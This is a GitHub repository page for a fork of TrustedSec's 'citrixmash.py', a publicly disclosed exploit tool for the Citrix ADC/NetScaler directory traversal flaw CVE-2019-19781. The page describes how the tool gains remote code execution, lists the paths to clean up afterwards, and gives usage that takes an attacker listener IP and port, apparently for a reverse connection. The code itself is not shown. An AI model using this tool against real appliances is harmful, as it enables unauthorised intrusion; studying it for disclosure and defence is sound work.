Skip to content
/ cve-2019-19781 Public
forked from trustedsec/cve-2019-19781

This is a tool published for the Citrix ADC (NetScaler) vulnerability. We are only disclosing this due to others publishing the exploit code first.

License

View license
0 stars 129 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

syedpeer/cve-2019-19781

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
LICENSE.txt
LICENSE.txt
 
 
README.md
README.md
 
 
citrixmash.py
citrixmash.py
 
 

Repository files navigation

root@stronghold-nix:/home/relik/Desktop/git/cve-2019-19781# python citrixmash.py

Citrixmash v0.1 - Exploits the Citrix Directory Traversal Bug: CVE-2019-19781 INTERNAL RELEASE ONLY: TrustedSec Internal Tool Written by: Rob Simon and Dave Kennedy Contributions: The TrustedSec Team Website: https://www.trustedsec.com INFO: https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/

This tool exploits a directory traversal bug within Citrix ADC (NetScalers) which calls a perl script that is used to append files in an XML format to the victim machine. This in turn allows for remote code execution.

Be sure to cleanup these two file locations: /var/tmp/netscaler/portal/templates/ /netscaler/portal/templates/

Usage:

python citrixmash.py <attacker_listener> <attacker_port>

usage: citrixmash.py [-h] target targetport attackerip attackerport

About

This is a tool published for the Citrix ADC (NetScaler) vulnerability. We are only disclosing this due to others publishing the exploit code first.

Resources

Readme

License

View license
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%